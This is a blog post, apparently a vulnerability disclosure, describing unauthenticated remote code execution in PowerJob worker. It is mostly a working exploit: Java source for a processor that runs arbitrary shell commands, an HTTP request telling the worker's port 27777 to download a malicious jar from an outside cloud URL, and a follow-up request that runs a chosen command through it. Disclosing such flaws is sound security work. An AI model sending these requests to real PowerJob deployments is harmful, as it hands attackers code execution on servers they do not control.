TestNet
文章
11
分类
3
评论
1

PowerJob worker Unauthorized remote code execution

| 代码审计
字数总计 3539 | 阅读时长 8分钟 | 阅读量 308

PowerJob worker has a Unauthorized remote code execution vulnerability.
First,we build a jar with code:

@Component
public class SimpleProcessor implements BasicProcessor {

    @Override
    public ProcessResult process(TaskContext taskContext) {
        OmsLogger omsLogger = taskContext.getOmsLogger();
        omsLogger.info("SimpleProcessor start to process, current JobParams is {}.", taskContext.getJobParams());
        String command = taskContext.getInstanceParams();
        ProcessBuilder builder = new ProcessBuilder();
        Process process = null;
        try {
            if (SystemUtils.IS_OS_WINDOWS) {
                process = builder.command("cmd.exe", "/c", command).redirectErrorStream(true).start();
            } else {
                process = builder.command("sh", "-c", command).redirectErrorStream(true).start();
            }
            InputStream inputStream = process.getInputStream();
            BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream));
            String line;
            while ((line = reader.readLine()) != null) {
                omsLogger.info(line);
            }
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
        return new ProcessResult(true, "simple processor finished with params=" + command);
    }
}

Using the maven package command to package the jar, now I have packaged a malicious jar file:
java11 payload
java8 payload
Then send request to worker’s port 27777:

POST /worker/deployContainer HTTP/1.1
content-type: application/json
Content-Length: 163
host: 172.16.27.29:27777

{"containerId":90,"containerName":"rce-demo","version":"bbb","downloadURL":"https://wiz-1251828685.cos.ap-shanghai.myqcloud.com/photos/4736658854a4f045e0ebfc72732ec779.jar"}
bash

image.png
Now we can execution code with this request:

POST /worker/runJob HTTP/1.1
content-type: application/json
Content-Length: 550
host: 172.16.27.29:27777

{"allWorkerAddress":["172.16.27.29:27777"],"maxWorkerCount":0,"jobId":46,"wfInstanceId":null,"instanceId":520642210811609408,"executeType":"BROADCAST","processorType":"EXTERNAL","processorInfo":"90#org.example.demo.SimpleProcessor","instanceTimeoutMS":0,"jobParams":"","instanceParams":"open /System/Applications/Calculator.app","threadConcurrency":5,"taskRetryNum":1,"timeExpressionType":"API","timeExpression":null,"maxInstanceNum":0,"alarmConfig":"{\"alertThreshold\":0,\"silenceWindowLen\":0,\"statisticWindowLen\":0}","logConfig":"{\"type\":1}"}

image.png
After a few seconds,the command will be execute:
image.png

文章作者: TestNet
本文链接:
版权声明: 本站所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 TestNet
代码审计
喜欢就支持一下吧